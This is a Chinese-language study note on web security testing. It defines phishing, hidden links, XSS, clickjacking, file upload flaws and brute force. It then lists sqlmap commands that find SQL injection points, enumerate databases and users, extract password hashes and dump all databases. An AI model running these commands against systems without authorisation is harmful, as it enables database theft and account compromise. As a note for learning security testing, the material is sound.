安全测试-SQL注入

1、安全测试的本质是什么？止损、攻防
2、安全漏洞根据客户端与服务器端的分布：

3、钓鱼：黑客构造一个跟知名网站很相似的网站，吸引用户登录，输入敏感信息，或通过邮件等验证方式，不知不觉中获得用户的登录密码之类的。
4、暗链：其实“暗链”就是看不见的网站链接，“暗链”在网站中的链接做的非常隐蔽，短时间内不易被搜索引擎察觉。它和友情链接有相似之处，可以有效地提高PR值。但要注意一点PR值是对单独页面，而不是整个网站。
暗链一般是把html的框架设置为不可见的，既00或者为负
5、xss：跨站脚本攻击。恶意攻击者往Web页面里插入恶意html代码，当用户浏览该页之时，嵌入其中Web里面的html代码会被执行，从而达到恶意用户的特殊目的。主要指的自己构造XSS跨站漏洞网页或者寻找非目标机以外的有跨站漏洞的网页。
6、点击劫持：是一种视觉上的欺骗手段。大概有两种方式，一是攻击者使用一个透明的iframe，覆盖在一个网页上，然后诱使用户在该页面上进行操作，此时用户将在不知情的情况下点击透明的iframe页面；二是攻击者使用一张图片覆盖在网页，遮挡网页原有位置的含义；简单说， 攻击者盗用了你的身份，以你的名义发送恶意请求。
7、URL跳转：存在URL跳转漏洞的页面
8、文件上传/文件包含：上传的附件没有进行过滤，当上传的文件为危险文件时，依然可以上传成功。 比如一句话木马的php文件。 这样很容易服务器的后台被控制
9、暴力破解：使用一个好的字典，利用工具，暴力破解网站的登录名和密码。 这要求字典一定要有很多常用数据。 字典也可以用python自己写。
10、今天介绍下，sql注入：所谓SQL注入，就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串，最终达到欺骗服务器执行恶意的SQL命令，比如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的，这类表单特别容易受到SQL注入式攻击．
11、sqlmap工作流程图：

12、名词解释：
拖库：是指黑客侵入有价值的网络站点，把注册用户的资料数据库全部盗走的行为
洗库：在取得大量的用户数据后，黑客会通过一系列的技术手段和黑丝产业链将有价值的用户数据分类及变现
撞库：黑客将得到的数据在其他网站上进行尝试登陆
13、进入到sqlmap工具中输入命令，查看接口是否安全：
----Get请求------------
A.检查是否有注入点
python sqlmap.py -u “接口” --batch
B.暴库
python sqlmap.py -u “接口” --batch --dbs
C.找出web接口当前使用哪个数据库
python sqlmap.py -u “接口” --batch --current-db
D.找出web接口当前数据库的账户：
python sqlmap.py -u “接口” --batch --current-user
E.列出数据库所有用户：
python sqlmap.py -u “接口” --batch --users
F.获取数据库账户与密码：
python sqlmap.py -u “接口” --batch --passwords
G.获取当前数据库的所有表：
python sqlmap.py -u “接口” --batch -D interface --tables
注：-D代表某个库
J.拖库–将所有库的数据全部导出来
python sqlmap.py -u “接口” --batch --dump-all
14、-------Post请求--------------------------------
A.检查是否有注入点----参数参照get(请求参数用–data)
python sqlmap.py -u “接口” --data=“参数” --batch
B、其他同get请求